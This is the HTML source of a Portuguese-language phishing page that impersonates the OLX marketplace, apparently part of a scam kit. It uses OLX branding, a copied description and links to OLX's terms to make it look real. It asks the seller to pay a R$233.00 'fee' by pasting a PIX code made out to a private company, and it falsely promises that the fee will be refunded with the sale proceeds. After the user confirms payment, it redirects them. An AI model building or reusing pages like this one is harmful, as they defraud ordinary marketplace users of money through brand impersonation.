<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charSet="utf-8"/>
    <meta name="theme-color" content="#000000"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/>
    <meta name="description" content="OLX - Rápido e Fácil pra comprar e desapegar. Vender e Comprar nunca foi tão fácil! Anuncie Online na OLX - Você tem alguma coisa para desapegar. Desapega!"/>
    <title>Pagamento da Taxa Enjoei | OLX</title>
    <link data-react-helmet="true" rel="apple-touch-icon" sizes="180x180" href="img/apple-touch-icon.png"/>
    <link data-react-helmet="true" rel="icon" type="image/png" sizes="32x32" href="img/favicon-32x32.png"/>
    <link data-react-helmet="true" rel="icon" type="image/png" sizes="192x192" href="img/android-chrome-192x192.png"/>
    <link data-react-helmet="true" rel="icon" type="image/png" sizes="16x16" href="img/favicon-16x16.png"/>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Nunito+Sans:ital,opsz@0,6..12;1,6..12&display=swap" rel="stylesheet">
    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            width: 100%;
            overflow-x: hidden;
            font-family: 'Nunito Sans', sans-serif;
            background-color: #ffffff;
        }
        .header {
            background-color: #fff;
            border-bottom: 1px solid #c7c7c7;
            padding-bottom: 21px;
            display: flex;
            justify-content: center;
        }
        .logo {
            width: 47px;
            margin-top: 27px;
        }
        .form-container {
            position: relative;
            background-color: #fff;
            border: 1px solid #e0e0e0;
            border-radius: 8px;
            padding: 20px;
            width: 100%;
            overflow: hidden;
            text-align: center;
            max-height: 70vh;
            max-width: fit-content;
            margin: 47px auto;
            margin-bottom: 10px;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        .form-container h1 {
            font-size: 25px;
            margin-bottom: 20px;
        }
        .form-container p {
            font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
        }
        .form-container textarea {
            width: 597px;
            margin: 0px auto;
            height: 70px;
            padding: 10px;
            font-size: 14px;
            border: 1px solid #e0e0e0;
            border-radius: 8px;
            margin-bottom: 20px;
        }
        .form-container button {
            background-color: #f28000;
            color: #fff;
            border: none;
            border-radius: 20px;
            padding: 12px 32px;
            font-size: 14px;
            font-weight: bold;
            cursor: pointer;
            width: 100%;
            margin-top: 10px;
            margin-bottom: 20px;
            box-sizing: border-box;
        }
        .form-container button:hover {
            background-color: #e56c00;
        }
        .form-container .dados-pagamento {
            font-size: 14px;
            text-align: left;
            width: 100%;
            margin-top: 20px;
        }
        .form-container .dados-pagamento p {
            margin: 5px 0;
        }
        .continuar {
            font-size: 12px;
            color: #666;
            text-align: center;
            padding: 10px 20px;
            width: 100%;
            background-color: #f8f8f8;
            border-top: 1px solid #e0e0e0;
            margin-top: 20px;
        }
        @media (max-width: 768px) {
            .form-container {
                padding: 20px;
                max-width: 90%;
                margin-top: 20px;
            }
            .form-container h1 {
                font-size: 18px;
                margin-bottom: 15px;
            }
            .form-container p {
                font-size: 14px;
            }
            .form-container button {
                padding: 10px 20px;
                font-size: 12px;
            }
        }

        #btn-pix {
            background-color: #884BC5;
        }
    </style>
    <script>
        function copyToClipboard() {
            const textareaElement = document.getElementById('pix-code');
            textareaElement.select();
            document.execCommand('copy');
            alert('Código PIX copiado para a área de transferência!');
        }

        function delayedRedirect() {
            setTimeout(function() {
                window.location.href = "/inicial.html";
            }, 200)
        }
    </script>
</head>
<body>
    <header class="header">
        <nav>
            <div class="logo">
                <img src="img/olx.svg" alt="olx-image">
            </div>
        </nav>
    </header>
    <div class="form-container">
        <h1>Pagamento da Taxa OLX</h1>
        <p>Copie o código abaixo para o PIX (Copiar e Colar).</p>
        <p>Este valor será devolvido imediatamente junto aos valores da venda.</p>
        <textarea id="pix-code" style="width: 597px; margin: 0px auto; height: 70px;">00020126850014br.gov.bcb.pix2563pix.voluti.com.br/qr/v3/at/c2ff7685-fb3f-42ed-9836-a4321f0aeaf15204000053039865802BR5924PAULO_R_LEMOS_E_CIA_LTDA6014RIO_DE_JANEIRO62070503***63043B53</textarea>
        <button onclick="copyToClipboard()" id="btn-pix">Copiar pix</button>
        <button onclick="delayedRedirect()">Efetuei o pagamento</button>
        <div class="dados-pagamento">
            <p><strong>Dados de pagamento</strong></p>
            <p><strong>Valor:</strong> R$233.00</p>
            <p><strong>Referência:</strong> 16456970-0</p>
        </div>
    </div>
    <div class="continuar">
        <p>Ao continuar, você concorda com os <a href="https://ajuda.olx.com.br/s/article/termos-e-condicoes-de-uso">Termos de Uso</a> e a <a href="https://ajuda.olx.com.br/s/article/politica-de-privacidade">Política de Privacidade</a></p>
        <p> da OLX e seus parceiros, e em receber comunicações da OLX.</p>
    </div>
</body>
</html>